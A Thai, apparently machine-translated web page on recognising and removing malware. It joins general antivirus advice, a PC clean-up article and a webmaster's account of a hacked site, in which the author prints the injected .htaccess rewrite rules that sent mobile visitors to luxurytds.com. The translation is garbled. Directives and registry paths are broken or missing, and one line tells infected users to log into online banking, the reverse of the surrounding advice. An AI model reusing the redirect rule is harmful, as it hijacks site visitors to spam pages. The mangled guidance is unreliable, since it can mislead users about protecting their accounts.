ส่วนของเว็บไซต์

ตัวเลือกของบรรณาธิการ:

การโฆษณา

บ้าน - สำหรับผู้เริ่มต้น
จะทำอย่างไรถ้าคอมพิวเตอร์ของคุณติดไวรัส? จะทำอย่างไรถ้ามีไวรัสเข้าสู่อุปกรณ์ของคุณ? เว็บไวรัสมีลักษณะอย่างไร?

น่าเสียดายที่บางครั้งมันเกิดขึ้นที่โปรแกรมป้องกันไวรัสที่ติดตั้งบนระบบที่มีการอัพเดตล่าสุดไม่สามารถตรวจพบไวรัส เวิร์ม หรือโทรจันตัวใหม่ได้ น่าเสียดายที่ไม่มีการป้องกันไวรัสใดรับประกันความปลอดภัย 100% ในกรณีนี้ จำเป็นต้องตรวจสอบข้อเท็จจริงของการติดไวรัส ตรวจจับไฟล์ไวรัส และส่งไปยังบริษัทป้องกันไวรัสซึ่งมีผลิตภัณฑ์ "พลาด" โปรแกรมที่เป็นอันตราย และไม่สามารถป้องกันคอมพิวเตอร์จากการติดไวรัสได้

อย่างไรก็ตาม ในกรณีส่วนใหญ่ เป็นการยากที่จะสังเกตเห็นด้วยตัวคุณเอง (โดยไม่ได้รับความช่วยเหลือจากโปรแกรมป้องกันไวรัส) ว่าคอมพิวเตอร์ของคุณติดไวรัส - เวิร์มและโทรจันจำนวนมากไม่แสดงตนในทางใดทางหนึ่ง แน่นอนว่า มีหลายกรณีที่โทรจันแจ้งผู้ใช้อย่างชัดเจนว่าคอมพิวเตอร์ติดไวรัส ตัวอย่างเช่น ในกรณีของการเข้ารหัสไฟล์ของผู้ใช้แล้วเรียกร้องค่าไถ่สำหรับยูทิลิตีการถอดรหัส แต่โดยปกติแล้วพวกเขาจะแอบติดตั้งตัวเองเข้าสู่ระบบ มักใช้วิธีการพรางตัวแบบพิเศษ และยังแอบดำเนินกิจกรรมโทรจันอีกด้วย ความจริงของการติดเชื้อสามารถตรวจพบได้จากสัญญาณทางอ้อมเท่านั้น

สัญญาณของการติดเชื้อ

สัญญาณหลักของการติดเชื้อ ได้แก่ ปริมาณการใช้อินเทอร์เน็ตขาออกที่เพิ่มขึ้น ซึ่งเป็นกฎที่ใช้ได้ทั้งผู้ใช้รายบุคคลและเครือข่ายองค์กร หากไม่มีกิจกรรมทางอินเทอร์เน็ตที่ใช้งานอยู่ (เช่น ตอนกลางคืน) แสดงว่ามีคนกำลังทำกิจกรรมนั้นอยู่ และเป็นไปได้มากว่าเพื่อจุดประสงค์ที่เป็นอันตราย หากคุณมีไฟร์วอลล์ สัญญาณของการติดไวรัสอาจเกิดจากการพยายามเปิดการเชื่อมต่ออินเทอร์เน็ตโดยแอปพลิเคชันที่ไม่รู้จัก ป๊อปอัปโฆษณาจำนวนมากเมื่อเยี่ยมชมเว็บไซต์สามารถส่งสัญญาณว่ามีระบบโฆษณา (แอดแวร์) อยู่ในระบบ

การค้างและขัดข้องบ่อยครั้งในคอมพิวเตอร์ของคุณอาจเกิดจากการติดไวรัส อย่างไรก็ตาม ในหลายกรณี สาเหตุของความล้มเหลวไม่ใช่ไวรัส แต่เป็นฮาร์ดแวร์หรือซอฟต์แวร์ หากอาการที่คล้ายกันปรากฏบนคอมพิวเตอร์หลายเครื่องบนเครือข่ายพร้อมกัน หากการรับส่งข้อมูลอินทราเน็ตเพิ่มขึ้นอย่างรวดเร็วในเวลาเดียวกัน สาเหตุน่าจะอยู่ที่การแพร่กระจายของเวิร์มเครือข่ายอื่นหรือโปรแกรมลับๆ โทรจันผ่านเครือข่าย

สัญญาณทางอ้อมของการติดเชื้ออาจรวมถึงอาการที่ไม่ใช่คอมพิวเตอร์ด้วย เช่น บิลค่าโทรศัพท์หรือข้อความ SMS ที่ไม่มีอยู่จริง นี่อาจบ่งชี้ว่ามี “โทรจันโทรศัพท์” ปรากฏบนคอมพิวเตอร์หรือโทรศัพท์มือถือของคุณ หากมีการบันทึกกรณีการเข้าถึงบัญชีธนาคารส่วนบุคคลโดยไม่ได้รับอนุญาตหรือข้อเท็จจริงในการใช้บัตรเครดิต นี่อาจเป็นสัญญาณของสปายแวร์ที่ฝังอยู่ในระบบ

อาจเป็นไปได้ว่าชุดฐานข้อมูลต่อต้านไวรัสล้าสมัย - คุณต้องดาวน์โหลดอัปเดตล่าสุดและสแกนคอมพิวเตอร์ของคุณ หากวิธีนี้ไม่ได้ผล โปรแกรมป้องกันไวรัสจากผู้ผลิตรายอื่นอาจช่วยได้ บริษัทป้องกันไวรัสที่มีชื่อเสียงส่วนใหญ่ปล่อยผลิตภัณฑ์เวอร์ชันฟรี (เวอร์ชันทดลองหรือ "ตัวล้างข้อมูล") เพียงครั้งเดียว - ขอแนะนำให้ใช้บริการนี้ หากไวรัสหรือโปรแกรมโทรจันถูกตรวจพบโดยโปรแกรมป้องกันไวรัสอื่น ไม่ว่าในกรณีใด ไฟล์ที่ติดไวรัสควรถูกส่งไปยังผู้พัฒนาโปรแกรมป้องกันไวรัสที่ตรวจไม่พบ สิ่งนี้จะช่วยให้คุณเพิ่มลงในการอัปเดตได้รวดเร็วยิ่งขึ้นและปกป้องผู้ใช้โปรแกรมป้องกันไวรัสนี้จากการติดไวรัส

หากไม่พบสิ่งใดเลย ก่อนที่คุณจะเริ่มค้นหาไฟล์ที่ติดไวรัส ขอแนะนำให้ตัดการเชื่อมต่อคอมพิวเตอร์จากอินเทอร์เน็ตหรือเครือข่ายท้องถิ่นก่อน หากเชื่อมต่ออยู่ และปิดอะแดปเตอร์ Wi-Fi และโมเด็ม ( ถ้ามี) ในอนาคต ให้ใช้เครือข่ายเมื่อจำเป็นจริงๆ เท่านั้น ห้ามใช้ระบบการชำระเงินออนไลน์หรือบริการธนาคารออนไลน์ไม่ว่าในกรณีใด ๆ หลีกเลี่ยงการเข้าถึงข้อมูลส่วนบุคคลและข้อมูลลับใด ๆ และอย่าใช้บริการอินเทอร์เน็ตที่ต้องใช้การเข้าสู่ระบบและรหัสผ่านในการเข้าถึง

วิธีค้นหาไฟล์ที่ติดไวรัส

การตรวจจับไวรัสหรือโทรจันบนคอมพิวเตอร์อาจเป็นงานที่ยาก โดยต้องใช้คุณสมบัติสูงหรือค่อนข้างเล็กน้อย ขึ้นอยู่กับความซับซ้อนของไวรัสหรือโทรจัน และวิธีที่ใช้ในการซ่อนโค้ดที่เป็นอันตรายในระบบ ใน “กรณีที่ร้ายแรง” เมื่อใช้วิธีการพิเศษในการปกปิดและซ่อนโค้ดที่ติดไวรัสในระบบ (เช่น เทคโนโลยีรูทคิท) ผู้ที่ไม่ใช่มืออาชีพจะไม่สามารถค้นหาไฟล์ที่ติดไวรัสได้ งานนี้ต้องใช้ยูทิลิตี้พิเศษ อาจเชื่อมต่อฮาร์ดไดรฟ์เข้ากับคอมพิวเตอร์เครื่องอื่นหรือบูตระบบจากซีดี หากคุณพบเวิร์มหรือโปรแกรมโทรจันทั่วไป บางครั้งคุณจะพบมันด้วยวิธีที่ค่อนข้างง่าย

เวิร์มและโทรจันส่วนใหญ่จะต้องได้รับการควบคุมเมื่อเริ่มต้นระบบ เมื่อต้องการทำเช่นนี้ ในกรณีส่วนใหญ่จะใช้วิธีการหลักสองวิธี:

  • บันทึกลิงก์ไปยังไฟล์ที่ติดไวรัสในคีย์การทำงานอัตโนมัติของรีจิสทรีระบบ Windows
  • คัดลอกไฟล์ไปยังไดเร็กทอรีเริ่มต้น Windows

ไดเร็กทอรีเริ่มต้นที่ "ได้รับความนิยม" มากที่สุดใน Windows 2000 และ XP มีดังนี้:

  • \%เอกสารและการตั้งค่า%\%ชื่อผู้ใช้%\Start Menu\Programs\Startup\
  • \%เอกสารและการตั้งค่า%\ผู้ใช้ทั้งหมด\Start Menu\Programs\Startup\

หากพบไฟล์ที่น่าสงสัยในไดเร็กทอรีเหล่านี้ ขอแนะนำให้ส่งไฟล์เหล่านั้นไปยังบริษัทผู้พัฒนาโปรแกรมป้องกันไวรัสทันทีพร้อมคำอธิบายปัญหา

มีคีย์การทำงานอัตโนมัติค่อนข้างมากในรีจิสทรีของระบบ ซึ่งคีย์ที่ได้รับความนิยมมากที่สุดคือคีย์ Run, RunService, RunOnce และ RunServiceOnce ในสาขารีจิสทรี:

เป็นไปได้มากว่าจะพบคีย์หลายคีย์ที่มีชื่อและเส้นทางที่ไม่สามารถเข้าใจได้ไปยังไฟล์ที่เกี่ยวข้อง ควรให้ความสนใจเป็นพิเศษกับไฟล์ที่อยู่ในระบบ Windows หรือไดเร็กทอรีรูท จำเป็นต้องจำชื่อไว้ซึ่งจะเป็นประโยชน์ในการวิเคราะห์ต่อไป

นอกจากนี้ “ยอดนิยม” ยังเป็นรายการในคีย์ต่อไปนี้:

ค่าเริ่มต้นในคีย์นี้คือ "%1" %*"

ตำแหน่งที่สะดวกที่สุดในการวางเวิร์มและโทรจันคือระบบ (ระบบ, system32) และไดเรกทอรีรากของ Windows เนื่องจากประการแรก การแสดงเนื้อหาของไดเร็กทอรีเหล่านี้ใน Explorer ถูกปิดใช้งานโดยค่าเริ่มต้น และประการที่สองมีไฟล์ระบบที่แตกต่างกันจำนวนมากอยู่แล้วโดยผู้ใช้ทั่วไปไม่ทราบจุดประสงค์และเป็นปัญหามากสำหรับผู้ใช้ที่มีประสบการณ์ในการเข้าใจว่าไฟล์ชื่อ winkrnl386.exe เป็นส่วนหนึ่งของระบบปฏิบัติการหรือไม่ หรือสิ่งแปลกปลอม

ขอแนะนำให้ใช้ตัวจัดการไฟล์ใด ๆ ที่มีความสามารถในการจัดเรียงไฟล์ตามวันที่สร้างและแก้ไขและเรียงลำดับไฟล์ในไดเร็กทอรีที่ระบุ ด้วยเหตุนี้ ไฟล์ที่สร้างและแก้ไขล่าสุดทั้งหมดจะแสดงที่ด้านบนของไดเร็กทอรี และไฟล์เหล่านี้คือไฟล์ที่น่าสนใจ การมีอยู่ของไฟล์ที่พบในคีย์การทำงานอัตโนมัติถือเป็นสัญญาณเตือนภัยครั้งแรก

ผู้ใช้ที่มีประสบการณ์มากขึ้นสามารถตรวจสอบพอร์ตเครือข่ายที่เปิดอยู่โดยใช้ยูทิลิตี้ netstat มาตรฐาน ขอแนะนำให้ติดตั้งไฟร์วอลล์และตรวจสอบกระบวนการที่ดำเนินกิจกรรมเครือข่าย ขอแนะนำให้ตรวจสอบรายการกระบวนการที่ใช้งานอยู่และใช้เครื่องมือ Windows ไม่ใช่มาตรฐาน แต่เป็นยูทิลิตี้พิเศษที่มีความสามารถขั้นสูง - โปรแกรมโทรจันหลายโปรแกรมปลอมตัวเป็นยูทิลิตี้ Windows มาตรฐานได้สำเร็จ

แต่ไม่มีคำแนะนำที่เป็นสากลสำหรับทุกโอกาส บ่อยครั้งที่คุณต้องจัดการกับเวิร์มและโปรแกรมโทรจัน "ขั้นสูง" ในทางเทคนิคซึ่งตรวจจับได้ไม่ง่ายนัก ในกรณีนี้ คุณต้องขอความช่วยเหลือจากบริการสนับสนุนด้านเทคนิคของบริษัทป้องกันไวรัส การป้องกันที่ติดตั้งบนคอมพิวเตอร์ของคุณ หรือจากบริษัทใดบริษัทหนึ่งที่เชี่ยวชาญด้านความช่วยเหลือเกี่ยวกับคอมพิวเตอร์ หรือขอความช่วยเหลือบนอินเทอร์เน็ตที่เหมาะสม ฟอรั่ม แหล่งข้อมูลดังกล่าวประกอบด้วย www.virusinfo.info และ anti-malware.ru ในภาษารัสเซีย รวมถึง www.rootkit.com และ www.gmer.net ที่เป็นภาษาอังกฤษ อย่างไรก็ตาม บริษัทแอนตี้ไวรัสหลายแห่งก็มีฟอรั่มที่คล้ายกันซึ่งเชี่ยวชาญด้านการช่วยเหลือผู้ใช้

16.02.2015 16:05:23

มีโอกาสที่คอมพิวเตอร์ของคุณจะติดมัลแวร์อยู่เสมอ แม้ว่าคุณจะติดตั้งโปรแกรมป้องกันไวรัสไว้ก็ตาม และเมื่อไม่ได้ติดตั้งซอฟต์แวร์ความปลอดภัยบนคอมพิวเตอร์ ความน่าจะเป็นนี้จะยิ่งสูงขึ้นไปอีก

หากเกิดการติดเชื้อ ควรติดต่อผู้เชี่ยวชาญเพื่อรับ “การรักษา” อย่างไรก็ตาม อาจไม่มีผู้เชี่ยวชาญด้านคอมพิวเตอร์อยู่ใกล้ๆ ในบทความนี้ คุณสามารถเรียนรู้วิธีระบุการติดเชื้อด้วยตนเองและแก้ไขปัญหา หรือลดความเสี่ยงของอันตรายก่อนที่ผู้เชี่ยวชาญจะมาถึงหากเป็นไปได้

สัญญาณของการติดเชื้อ

หากคุณสงสัยว่ามีไวรัส

เนื่องจากไวรัสสมัยใหม่ได้รับการ "ปรับแต่ง" ให้ทำงานบนเครือข่าย หากคุณสงสัยว่ามีการติดไวรัส การถอดสายเคเบิลเครือข่ายออกจากคอมพิวเตอร์จึงเป็นสิ่งสำคัญอย่างยิ่ง หรือหากเครือข่ายเป็นแบบไร้สาย ให้ปิดโมดูล Wi-Fi

น่าเสียดายที่มีบางสถานการณ์ที่เครือข่ายจำเป็นต้องดำเนินการ "การรักษา" - เช่น เพื่อดาวน์โหลดโปรแกรมป้องกันไวรัส แน่นอนว่าการดาวน์โหลดยูทิลิตี้ป้องกันไวรัสจากที่อื่นจะถูกต้องมากกว่า จากนั้นคัดลอกไปยังคอมพิวเตอร์ที่ติดไวรัสแต่ไม่ได้เชื่อมต่ออยู่ เช่น การใช้แฟลชไดรฟ์ หากไม่มีวิธีนี้ คุณสามารถลองใช้อินเทอร์เน็ตได้ อย่างไรก็ตาม ไม่ว่าในกรณีใดคุณควรเข้าสู่ระบบธนาคารออนไลน์ เชื่อมต่อกับกล่องจดหมาย และอื่นๆ กล่าวคือ ห้ามเปิดเผยข้อมูลที่เป็นความลับไม่ว่าในทางใด ทันทีที่ดาวน์โหลดเครื่องมือป้องกันไวรัสที่จำเป็นทั้งหมดแล้ว เครือข่ายจะต้องถูกปิด

ควรเข้าใจว่าการที่คอมพิวเตอร์ติดไวรัส นั่นคือการมีไวรัสที่ใช้งานอยู่ในหน่วยความจำปฏิบัติการ อาจทำให้ "การรักษา" เป็นเรื่องยาก ไวรัสสามารถต้านทานได้: เช่น บล็อกการเข้าถึงเว็บไซต์ของผู้ผลิตแอนตี้ไวรัส หรือพรางตัวเองจากโปรแกรมแอนตี้ไวรัสบางตัว ซึ่งหมายความว่าในบางกรณีอาจจำเป็นต้องมี "การบำบัด" โดยใช้ระบบ "สะอาด" เพิ่มเติม ตัวอย่างเช่น คุณสามารถบูตระบบจากซีดี หรือคุณสามารถถอดฮาร์ดไดรฟ์ที่มีระบบที่ติดไวรัสออก และเชื่อมต่อเป็นฮาร์ดไดรฟ์ตัวที่สองกับคอมพิวเตอร์ที่ "สะอาด" ที่รู้จัก

วิธีการรักษาคอมพิวเตอร์

มีหลายวิธีในการกำจัดมัลแวร์ ซึ่งแต่ละวิธีก็มีข้อดีและข้อเสียของตัวเอง หากเกิดการติดเชื้อ ควรติดต่อผู้เชี่ยวชาญเพื่อรับ “การรักษา” อย่างไรก็ตาม อาจไม่มีผู้เชี่ยวชาญด้านคอมพิวเตอร์อยู่ใกล้ๆ ในบทความนี้ คุณสามารถเรียนรู้วิธีรับรู้การติดเชื้อด้วยตนเองและแก้ไขปัญหา หรือหากเป็นไปได้ ให้ลดความเสี่ยงต่ออันตรายก่อนที่ผู้เชี่ยวชาญจะมาถึง

วิธีที่ 1. การใช้เครื่องมือป้องกันไวรัสสำเร็จรูป

ผู้ใช้ส่วนใหญ่จะพอใจกับการ "ทำความสะอาด" คอมพิวเตอร์โดยใช้เครื่องมือสำเร็จรูปที่นักพัฒนาซอฟต์แวร์ป้องกันไวรัสนำเสนอ โดยเฉพาะอย่างยิ่ง คุณสามารถค้นหายูทิลิตี้ฟรีที่ออกแบบมาเพื่อ "รักษา" คอมพิวเตอร์ที่ติดไวรัสโดยเฉพาะได้อย่างง่ายดาย นี่คือตัวอย่างบางส่วนของโปรแกรมดังกล่าวที่มีอินเทอร์เฟซภาษารัสเซีย:

  • ดร.เว็บ เคียวอิท! (http://www.freedrweb.com/cureit/);
  • เครื่องมือกำจัดไวรัส Kaspersky (http://www.kaspersky.ru/antivirus-removal-tool);
  • เครื่องสแกนความปลอดภัยของ Microsoft (http://www.microsoft.com/security/scanner/ru-ru/default.aspx)

แน่นอนคุณสามารถใช้ยูทิลิตี้อื่น ๆ ได้ แต่ขอแนะนำให้ดาวน์โหลดจากเว็บไซต์ผู้พัฒนาอย่างเป็นทางการเท่านั้น และขอแนะนำให้ดาวน์โหลดลงในคอมพิวเตอร์ที่ "แข็งแรง" ก่อนแล้วจึงโอนไปยังเครื่องที่ติดไวรัส

แม้จะมีความเรียบง่ายในการเปรียบเทียบของวิธีนี้ แต่ก่อนที่จะเริ่ม "การรักษา" คุณต้องเข้าใจหลักการหลายประการ:

  1. แม้ว่าคอมพิวเตอร์ของคุณจะได้รับการปกป้องด้วยซอฟต์แวร์ป้องกันไวรัส แต่ก็สามารถติดไวรัสได้เนื่องจากโปรแกรมป้องกันไวรัสไม่รู้จัก
  2. หากโปรแกรมป้องกันไวรัสไม่รู้จักไวรัสนี้ในขณะนั้น อาจเป็นไปได้มากที่ไวรัสจะเริ่มจดจำไวรัสได้ในอนาคต เช่น หากคุณอัปเดตฐานข้อมูลด้วยลายเซ็นไวรัส
  3. หากโปรแกรมป้องกันไวรัสที่ติดตั้งไม่รู้จักไวรัสนี้โดยเฉพาะ ก็ค่อนข้างเป็นไปได้ที่โปรแกรมป้องกันไวรัสจากผู้ผลิตรายอื่นจะจดจำได้
  4. หากไม่มีโปรแกรมป้องกันไวรัสใดตรวจพบไวรัสในคอมพิวเตอร์ของคุณ นี่ไม่ได้หมายความว่าไม่มีไวรัสเหล่านั้น อย่างไรก็ตาม เราไม่มีทางเลือกอื่นนอกจากต้องถือว่ามีความเป็นไปได้สูงที่คอมพิวเตอร์จะ "สะอาด"

กล่าวอีกนัยหนึ่งอาจเป็นไปได้ว่าคุณจะต้องดำเนินการบำบัดโดยใช้ยูทิลิตี้หลายตัวจากผู้ผลิตหลายราย

สูตรการรักษาทั่วไปมีดังนี้:

  1. หากคอมพิวเตอร์ของคุณติดไวรัส Blocker คุณต้องปลดบล็อกมันก่อน (คุณสามารถอ่านเพิ่มเติมเกี่ยวกับสิ่งนี้ได้ในบทความเกี่ยวกับ Trojan Blockers
  2. ติดตั้งและรันยูทิลิตี้การรักษา
  3. ทำตามคำแนะนำ
  4. หลังจากเสร็จสิ้นยูทิลิตี้ ให้ติดตั้งและเรียกใช้ยูทิลิตี้หนึ่งรายการขึ้นไปจากผู้ผลิตรายอื่นในลักษณะเดียวกัน
  5. คอมพิวเตอร์ได้รับการฆ่าเชื้อแล้ว ตอนนี้คุณต้องติดตั้ง (หรือติดตั้งใหม่) โปรแกรมป้องกันไวรัส
  6. คอมพิวเตอร์ได้รับการฆ่าเชื้อและป้องกัน คุณควรเปลี่ยนรหัสผ่านทั้งหมดสำหรับบริการอินเทอร์เน็ต โปรแกรมอีเมล โปรแกรมส่งข้อความด่วน ฯลฯ ขอแนะนำอย่างยิ่งให้ติดตามความเคลื่อนไหวของเงินทุนผ่านบัตรพลาสติกและบัญชีธนาคารหากคุณใช้ระบบธนาคารออนไลน์ ในกรณีที่มีธุรกรรมที่น่าสงสัย คุณควรติดต่อ ธนาคารเพื่ออนุมัติมาตรการที่จำเป็น - การยกเลิกการชำระเงิน การออกบัตรใหม่ ฯลฯ
  7. หากคุณไม่สามารถรักษาคอมพิวเตอร์ได้ด้วยตัวเองด้วยเหตุผลบางประการ คุณต้องติดต่อผู้เชี่ยวชาญ อย่าลืมเกี่ยวกับความพร้อมของการสนับสนุนด้านเทคนิคสำหรับผู้ใช้แอนติไวรัส ซึ่งจะช่วยให้คุณประหยัดเวลา ความกดดัน และเงินได้มาก

วิธีที่ 2: การติดตั้งระบบปฏิบัติการใหม่

นี่เป็นวิธีการที่รุนแรงซึ่งควรใช้หากยาต้านไวรัสไม่ช่วย ก่อนที่จะติดตั้งระบบปฏิบัติการอีกครั้งขอแนะนำให้ฟอร์แมตฮาร์ดไดรฟ์ก่อนซึ่งไม่สะดวกเสมอไปเนื่องจากจะนำไปสู่การทำลายไม่เพียง แต่โปรแกรมที่เป็นอันตรายเท่านั้น แต่ยังรวมถึงข้อมูลที่เป็นประโยชน์ด้วย นอกจากนี้ขั้นตอนการติดตั้งและการปรับแต่งระบบปฏิบัติการโดยเฉพาะยังใช้แรงงานค่อนข้างมาก

งานการติดตั้งระบบใหม่สามารถทำได้ง่ายขึ้นหากคุณดูแลเรื่องนี้ล่วงหน้า ตัวอย่างเช่นโฟลเดอร์ "My Documents" ใน Windows สามารถย้ายไปยังไดรฟ์ลอจิคัลหรือฟิสิคัลอื่นได้ซึ่งจะช่วยให้คุณสามารถฟอร์แมตพาร์ติชันระบบได้ตลอดเวลาโดยไม่ต้องกลัวว่าจะสูญเสียข้อมูลส่วนบุคคล นอกจากนี้เจ้าของ Windows เวอร์ชันล่าสุดยังมีโอกาสสร้างดิสก์การติดตั้งระบบปฏิบัติการที่เก็บชุดโปรแกรมและการตั้งค่าของตัวเองด้วย

คุณควรจำไว้ว่าหากคอมพิวเตอร์ของคุณติดไวรัสแรนซัมแวร์ การติดตั้งระบบใหม่จะไม่ช่วยให้คุณกู้คืนข้อมูลส่วนบุคคลที่เข้ารหัสได้

วิธีที่ 3: ตรวจจับและลบมัลแวร์ด้วยตนเอง

ควรบอกทันทีว่าแนะนำวิธีนี้เป็นครั้งสุดท้าย แม้แต่ความรู้เชิงลึกเกี่ยวกับระบบปฏิบัติการก็ไม่น่าจะช่วยให้คุณใช้งานได้อย่างถูกต้อง: มีความเป็นไปได้สูงที่คุณจะพลาดโมดูลที่เป็นอันตรายบางส่วนหรือในทางกลับกันทำผิดพลาดในโปรแกรมที่มีประโยชน์สำหรับไวรัสและลบสิ่งที่จำเป็นซึ่งเป็นการละเมิด ความสมบูรณ์ของระบบปฏิบัติการ

แม้ว่าเราจะให้คำแนะนำทั่วไปแก่คุณ เช่น คุณควรตรวจสอบโฟลเดอร์เริ่มต้นของโปรแกรมและคีย์การเริ่มต้นรีจิสทรีของ Windows สิ่งนี้จะไม่ช่วยได้มากนัก เนื่องจากหากไม่มีความรู้และประสบการณ์ระดับมืออาชีพในประเด็นด้านความปลอดภัยด้านไอที ก็จะเป็นเรื่องยากมาก เพื่อให้คุณแยกความแตกต่างระหว่างไฟล์ "ที่ไม่ดี" และ "ไฟล์ที่ดี"

เมื่อวานฉันมีเหตุการณ์ที่ไม่น่าพึงพอใจนัก - เว็บไซต์ทั้งหมดของฉันติดไวรัส เป็นเรื่องดีที่ฉันอยู่ที่คอมพิวเตอร์และสังเกตเห็นปัญหาทันที เกิดอะไรขึ้น


จู่ๆ ไซต์แห่งหนึ่งของฉันก็เริ่มถูกย้ายไปยังไซต์หาคู่บางประเภท ซึ่งเป็นไซต์ที่ไม่เหมาะสม พูดง่ายๆ ก็คือ เมื่อฉันไปที่โดเมนของฉัน ฉันถูกเปลี่ยนเส้นทางไปยังไซต์สแปมนี้ทันที

นี่เป็นสถานการณ์ที่แย่มาก เพราะหากคุณไม่แก้ไขปัญหาทันที คุณอาจทำให้ผู้เยี่ยมชมของคุณหวาดกลัวได้ และหากสิ่งนี้ดำเนินต่อไปเป็นเวลานาน เครื่องมือค้นหาอาจกำหนดตัวกรองบนไซต์ของคุณและคุณจะสูญเสียตำแหน่งทั้งหมดในการค้นหา

ฉันได้เขียนเกี่ยวกับเรื่องนั้นแล้ว แต่ในกรณีนี้ จำเป็นต้องค้นหาไวรัสอย่างรวดเร็ว ฉันเริ่มค้นหาโค้ดที่เป็นอันตรายด้วยตนเองทันที

เนื่องจากการเปลี่ยนเส้นทางมาจากทุกหน้า ฉันคิดว่าสคริปต์ประเภทใดที่ฝังอยู่ในส่วนหัว (header.php) หรือส่วนท้าย (footer.php) แต่ไม่มีรหัสที่ไม่เกี่ยวข้องอยู่ที่นั่น

ฉันติดต่อฝ่ายสนับสนุนโฮสติ้งทันที:

— ฉันมีเว็บไซต์แบบนี้ มันเริ่มเปลี่ยนเส้นทางไปยังแหล่งข้อมูลที่ไม่เหมาะสม ช่วยฉันแก้ปัญหาด้วย

แต่ก่อนที่พวกเขาจะมีเวลาตอบฉัน ฉันเองก็เดาได้ว่าจะต้องดูที่ไหนอีก ในไฟล์ .htaccess ซึ่งอยู่ที่รากของไซต์ ฉันพบโค้ดต่อไปนี้:

RewriteEngine บน RewriteBase / RewriteCond %(HTTP_USER_AGENT) android|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|pad)|iris|kindle|lge |maemo|meego.+ มือถือ|midp|mmp|netfront|palm(os)?|โทรศัพท์|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)| vodafone|wap|windows (ce|โทรศัพท์)|xda|xiino RewriteCond %(HTTP_USER_AGENT) ^(1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s- )|ai(ko|rn)|al(av|ca|co)|amoi|an(อดีต|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di |-m|r |s)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u )|c55/|capi|ccwa|cdm-|เซลล์|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob |ทำ(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze) |fetc|บิน(-|_)|g1 u|g560|ยีน|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p |t)|hei-|สวัสดี(pt|ta)|hp(i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu( aw|tc)|i-(20|go|ma)|i230|iac(|-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro |jemu|จิ๊ก|kddi|keji|kgt(|/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg(g|/(k|l|u)|50 |54|-)|libw|คม|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)| mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v)|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1) |10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan( a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt- g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma| มม|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar| sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v) |sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo |ถึง(กรุณา|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk (40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-|)|webc|เล็กน้อย|wi( g |nc|nw)|wmlb|wonu|x700|yas-|ของคุณ|zeto|zte-) RewriteRule ^$ _http://luxurytds.com/go.php?sid=1 # BULLETPROOF .50.8 >>>>> >> ปลอดภัย HTACCESS

ทันทีที่ฉันลบมันออก ทุกอย่างก็เริ่มทำงานตามปกติ ฉันใช้เวลา 5 นาทีในการทำทุกอย่าง แต่ถ้าในสถานที่ของฉันมีผู้เริ่มต้นที่สมบูรณ์ เขาอาจใช้เวลานานมากหากเขาสามารถค้นหาปัญหาด้วยตัวเอง

ฉันพบว่าเว็บไซต์ทั้งหมดของฉันติดไวรัสในลักษณะเดียวกัน ฉันแก้ไขปัญหาทันทีและเขียนถึงฝ่ายสนับสนุนโฮสติ้ง:

ไซต์ของฉันทั้งหมดติดไวรัส ซึ่งหมายความว่าทุกอย่างบนโฮสติ้งของคุณติดไวรัส เป็นความคิดที่ดีที่จะเตือนผู้อื่น

ซึ่งได้คำตอบมาว่า

เฉพาะไฟล์ในเว็บไซต์ของคุณเท่านั้นที่ "ติดไวรัส" ด้วยเหตุนี้ ไซต์บางแห่งของคุณจึงมีช่องโหว่ที่ใช้ในการเปลี่ยนแปลงไฟล์ในบัญชีของคุณ คุณต้องติดต่อนักพัฒนาเว็บเพื่อค้นหาและแก้ไขช่องโหว่เหล่านี้

บางทีก็ตรวจสอบไม่ได้ นี่ไม่ใช่ครั้งแรกที่มีคนพยายามแพร่ระบาดเว็บไซต์ของฉันบนโฮสติ้งนี้ เว็บมาสเตอร์ทุกคนประสบปัญหาเช่นนี้หรือไม่? หรือมันอยู่บนโฮสติ้งของฉันเท่านั้น?

นี่ไม่ใช่โฮสติ้งครั้งแรกของฉันและฉันไม่เคยประสบปัญหาดังกล่าวมาก่อนเลย ฉันมีแนวโน้มที่จะเปลี่ยนโฮสติ้งมากขึ้นเช่น นี้.

ก่อนที่ฉันจะมีเวลาแก้ไขปัญหานี้ ฝ่ายสนับสนุนด้านเทคนิคเขียนถึงฉันว่าไซต์อื่นของฉันกำลังส่งสแปม ปรากฎว่ามีการอัปโหลดไฟล์ php ต่างประเทศไปยังโฟลเดอร์ของฉันด้วยปลั๊กอินเดียวและมีการส่งสแปมผ่านไฟล์นั้น

